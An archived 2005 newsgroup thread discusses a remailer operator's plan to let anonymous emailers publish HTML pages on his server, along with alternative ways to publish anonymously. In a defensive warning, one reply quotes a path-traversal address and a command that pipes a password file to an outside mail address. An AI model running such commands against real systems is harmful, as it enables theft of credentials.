|
Home > Archive > Anonymous Servers > June 2005 > Allow Anonymous Poster To Create Web Page
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
Allow Anonymous Poster To Create Web Page
|
|
| admin@parsifal.ath.cx 2005-06-08, 5:47 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
What do you fellows think of this idea?
Have a web server or series of web servers, and allow an anonymous
poster to create a folder containing an html page. The page would
be the content of his anonymous mail message to the server, and
would be renamed to .html within the folder.
For example, somebody sends an anonymous email to
myweb1@mailsafe.ath.cx. It creates a folder named 'myweb1', and the
contents of the email, which is an .html file, are added to the
folder as 'myweb1.html'.
The sender can then alert people that his web page is available at
http://mailsafe.ath.cx/myweb1/myweb1.html.
The reason I suggest this, is that I know of no way somebody can
get a web page up to a web server without identifying himself. If
there is a simple way to do it, I would be grateful to hear about
it.
A user could create a set of web pages by having
/myweb1/myweb1.html refer to /myweb2/myweb2.html, etc.
I would be grateful for your opinions.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use
<http://www.pgp.com>
iQEVAwUBQqcPj8+YNVItMjFNAQGoXQgAv5KS1Blm
lits2lWJbnWwYBWBWE4k9mna
AA9iQjm63VyKSASO6MOi1ZV6xMopgPhUfSAHGwco
IYZfIt/Zn8UwWpnFopf6+Anu
vr7wnsL5MDaADDD/ G22jh2dTSjl0WNd8GGoPco1mcZ54fe1fq5D0EyFB
YKbCxqeY
7CgrvZSNFXNjTUfT8B4EHumzVRvq1pE6a/7NDIigDcxMhktAA1QNo6MJevEr2WEa
/ 3r2MdtxBHKZMvw6kTuwwZEuNHbAmcSGsCu8uaXTg
wJYy/lev5JM5WePEs/u41hx
xq+kBpV4BiOjJN/ VX7ta8+5vGmc3eM9YVnWehBtxERCfQ48hCH2yUw=
=
=yLhX
-----END PGP SIGNATURE-----
http://parsifal.ath.cx:81/miscx/ Remailer Information, Stats.
| |
| Gandalf Parker 2005-06-08, 5:47 pm |
| admin@parsifal.ath.cx wrote in news:FNKWQ46K38511.4832407407
@si93kru1.poster:
> For example, somebody sends an anonymous email to
> myweb1@mailsafe.ath.cx. It creates a folder named 'myweb1', and the
> contents of the email, which is an .html file, are added to the
> folder as 'myweb1.html'.
Interesting concept. I can see where that could be setup really easily.
And since some email programs (the ones I hate) make html mail so easy...
> The reason I suggest this, is that I know of no way somebody can
> get a web page up to a web server without identifying himself. If
> there is a simple way to do it, I would be grateful to hear about
> it.
The problem I see is that for any kindof impressive web page you are
opening up some nasty options on your system. You would need to have alot
of security procedures to keep from getting yourself trashed. In fact,
the security might be so extreme that you might end up with a text file,
which does of course display nicely in html. But if it gets that deep
then there are other ways to get an anonymous email or post displayed
where it can be found by a browser. Certain newsgroups do that. I think
it would even work for some basic html
Gandalf Parker
| |
|
| -----BEGIN PGP SIGNED MESSAGE-----
On Wed, 08 Jun 2005 15:57:48 GMT, Gandalf Parker
<gandalf@most.of.my.favorite.sites> wrote:
>admin@parsifal.ath.cx wrote in news:FNKWQ46K38511.4832407407
>@si93kru1.poster:
>
>
>Interesting concept. I can see where that could be setup really
>easily. And since some email programs (the ones I hate) make html
>mail so easy...
>
>
>The problem I see is that for any kindof impressive web page you
>are opening up some nasty options on your system.
Thanks for that heads-up. Knowing only the basics of web design,
that's the sort of thing I would not be aware of.
The rules in my mail server do block things like javascript, .scr,
..exe, etc., as a way to block viruses, but if there are other
dangers it would be good to know them.
References within the web page to the domain could be blocked. This
might foil some tricks, I'm not sure.
It would be nice, though, to allow a user to refer to a second web
page and a third, etc., in order to let him create something better
than a single page.
> You would need to have alot
>of security procedures to keep from getting yourself trashed. In
>fact, the security might be so extreme that you might end up with
>a text file, which does of course display nicely in html. But if
>it gets that deep then there are other ways to get an anonymous
>email or post displayed where it can be found by a browser.
>Certain newsgroups do that. I think it would even work for some
>basic html
Newsposts might be more difficult to refer to, though maybe a
reference to a Google archive would do the trick.
Anyhow, I put in a very basic setup. If anybody wants to try it,
please do so and let us know how it goes.
Send an email to somename@mailsafe.ath.cx, where 'somename' is the
name of the folder / html file you want to create.
The contents of the email should be html. javascript gets deleted,
as do messages with a conent type of .exe, .scr, etc.
So far, you can only put up one .html file in a folder. So, if you
send the message to somename@mailsafe.ath.cx, it will be created as
http://mailsafe.ath.cx/mailsafe/somename/somename.html.
There's an 80k limit on message size.
>
>
>Gandalf Parker
>
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQEVAwUBQqcfB8+YNVItMjFNAQEtjwf9EenNxKOO
u95jt7pAqNfCAuRUi7kJPf9c
tRPVybawto90nu+086TEOzfcTYoYeL6OwXXcRMOr
g68A+NL9GsEKUoKgof+e4n41
/ OoI37c7NH6mtTsFvm6BBxseWT3rtcrfblCczfDw6
P287KbSCh2jdYcLBLKNdpvA
UZXuPOkLAdV2DJ7i0Zit9k0m00qi8Wwg5QDZ34/3SjmQzrFUup2dDTHf3C5i9qb1
cJAclEeqHhqVO15BSdf61UndeKljX515DDeA42jU
0XM0+RdnQX/5R1US+Vnfufii
GaEVTyToPF1C3m+BhATSDMk7BppNWkdxOJgbw7rX
4SKqLJAf0bkHyA==
=3OeC
-----END PGP SIGNATURE-----
| |
| Gandalf Parker 2005-06-08, 5:47 pm |
| Admin <admin@parsifal.ath.cx> wrote in
news:1118248752. 444c61af250e15ad9547fd9549c59219@teranew
s:
> So far, you can only put up one .html file in a folder. So, if you
> send the message to somename@mailsafe.ath.cx, it will be created as
> http://mailsafe.ath.cx/mailsafe/somename/somename.html.
>
if I send it to ../../root@mailsafe (there is a way to do that) then will I
overwrite the root directory?
If I send to a name that is already there, does the script simply error on
the mkdir command then put the new html in place overwriting whats there
changing your web page anonymously?
How much space will you allow? How long can they leave it in place? Can
they try to do a cgi call to system commands such as
"cat /etc/password | mail backtoME@myhome.example"
Im really not trying to knock the idea. It has some merits. I just dont
want to see you burned too soon. Actually I can see where I could create
quite a page even if only text was allowed by linking to graphics already
on the net, various utilities, etc.
Gandalf Parker
| |
|
| -----BEGIN PGP SIGNED MESSAGE-----
On Wed, 08 Jun 2005 18:01:32 GMT, Gandalf Parker
<gandalf@most.of.my.favorite.sites> wrote:
>Admin <admin@parsifal.ath.cx> wrote in
>news:1118248752. 444c61af250e15ad9547fd9549c59219@teranew
s:
>
>
>if I send it to ../../root@mailsafe (there is a way to do that)
I don't like the sound of that.
> then will I
>overwrite the root directory?
I don't think so. I just added an additional format:
folder.page@mailsafe.ath.cx
so folder1.page1@mailsafe.ath.cx creates folder1 and, within it,
page1.
That can be followed by folder1.page2@mailsafe.ath.cx to add page2
to folder 1.
Nothing gets made when I try new1/folder1.page5@mailsafe.ath.cx.
>
>If I send to a name that is already there, does the script simply
>error on the mkdir command then put the new html in place
>overwriting whats there changing your web page anonymously?
It won't overrwrite. anybody can add a new page within the folder.
>
>How much space will you allow? How long can they leave it in
>place?
Who knows? It's rudimentary. If it went in for real, I'd allow it a
couple of gigs, and leave it in place until my next remailer, at
least.
>Can
>they try to do a cgi call to system commands such as
>"cat /etc/password | mail backtoME@myhome.example"
That one I really don't like the sound of. I don't know.
So you wonder if somebody could put up a web page with commands in
it
that let him see passwords, or, since this is windows, maybe he
could view the C directory, and then narrow it down and put up
another page to see the interesting passwods I have in
c:\passwords?
>
>Im really not trying to knock the idea. It has some merits. I just
>dont want to see you burned too soon. Actually I can see where I
>could create quite a page even if only text was allowed by
>linking to graphics already on the net, various utilities, etc.
>
>Gandalf Parker
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQEVAwUBQqc6yc+YNVItMjFNAQFKDgf+MK1U29Ed
lf67SOgj8HzRG2m1YbLxzZdi
5B5QxE+sm5VkhHvCJ/zLspUxNkSFTYusHQ//2c7YbVRGzKhOcifHPQ7KQvFcidXP
O72RogADp8vAwHgp+o3puMVQuEZi6IYBLDQqWzyS
uqGlAxuFHIyaPZw7BYvvPP3O
alVjNHmY/0LUWJOm/ EsqRP7pFyZLDFFczaHNn2rltPA1HQgcgvCm9bWeH
ot5rlon
LZd77NWXcgGEQYJTi0szQGEEB7KXcUhgroYxjBGy
lpgbU8QOfgIEkhT7WNRagB1m
pRqQlcUC/v4XQMD+ztSFw4ZyDapcO0Dbo6gL+TycihSgG/8j4cQ0mg==
=e7oH
-----END PGP SIGNATURE-----
| |
| Anonymous via the Cypherpunks Tonga Remailer 2005-06-09, 2:45 am |
| On Wed, 08 Jun 2005, <admin@parsifal.ath.cx> wrote:
> The reason I suggest this, is that I know of no way somebody can
> get a web page up to a web server without identifying himself. If
> there is a simple way to do it, I would be grateful to hear about
> it.
1. Install Tor and/or try to use anonymous proxies
2. Using Tor and/or anonymous proxies, set up an e-mail account at some
(free) e-mail provider.
3. Create a (free) account at http://internettrash.com
4. Using your above e-mail account, upload your HTML files to
internettrash.com. You can use Mix remailers with "from" headers for this
step.
| |
| A.Melon 2005-06-09, 7:46 am |
| Anonymous via the Cypherpunks Tonga Remailer <nobody@cypherpunks.to> wrote:
>1. Install Tor and/or try to use anonymous proxies
>
>2. Using Tor and/or anonymous proxies, set up an e-mail account at some
>(free) e-mail provider.
Could just use a nym server such as hod.aarg.net instead.
Better anonymity.
>
> 3. Create a (free) account at http://internettrash.com
>
> 4. Using your above e-mail account, upload your HTML files to
> internettrash.com. You can use Mix remailers with "from" headers for this
> step.
>
| |
| Terry Gareza 2005-06-10, 7:45 am |
| Once upon a 8 Jun 2005 15:41:13 -0000 dreary...over many a quaint and
curious alt.privacy.anon-server of forgotten lore... quoth
admin@parsifal.ath.cx...
>-----BEGIN PGP SIGNED MESSAGE-----
>
>What do you fellows think of this idea?
>
>Have a web server or series of web servers, and allow an anonymous
>poster to create a folder containing an html page. The page would
>be the content of his anonymous mail message to the server, and
>would be renamed to .html within the folder.
>
<snip>
>
>The reason I suggest this, is that I know of no way somebody can
>get a web page up to a web server without identifying himself. If
>there is a simple way to do it, I would be grateful to hear about
>it.
Already do-able. Post, *without* "X-No-Archive: yes", via anon remailers,
to a test group. Then point people to the Google URL (or use something like
tinyurl.com).
If you are careful, and keep checking for google's URL, you can set up a
group of pages that link---though only one-way links, no "go back" links.
Why reinvent the wheel?
--
Please help my friend get her business going:
http://www.cafepress.com/rowanchisholm
Evil Overlord Rule #88: If one of my daughters actually manages to win the hero
and openly defies me, I will congratulate her on her choice, proclaim a national
holiday to celebrate the wedding, and name the hero my heir. This should be en-
ough to break up their relationship. If not, at least I can be assured that the
hero won't attack me while I am holding a parade in his honor.
| |
| kcrusher@gmail.com 2005-06-19, 5:46 pm |
|
hello,
i am newbie, please can anyone to help me how to use TOR and Anon
proxies at the same time to increase anonymoty. I am already know how
to use TOR and anon proxies but cannot use them at the same time,.
Thanks
Anonymous via the Cypherpunks Tonga Remailer wrote:
> On Wed, 08 Jun 2005, <admin@parsifal.ath.cx> wrote:
>
>
> 1. Install Tor and/or try to use anonymous proxies
>
> 2. Using Tor and/or anonymous proxies, set up an e-mail account at some
> (free) e-mail provider.
>
> 3. Create a (free) account at http://internettrash.com
>
> 4. Using your above e-mail account, upload your HTML files to
> internettrash.com. You can use Mix remailers with "from" headers for this
> step.
|
|
|
|
|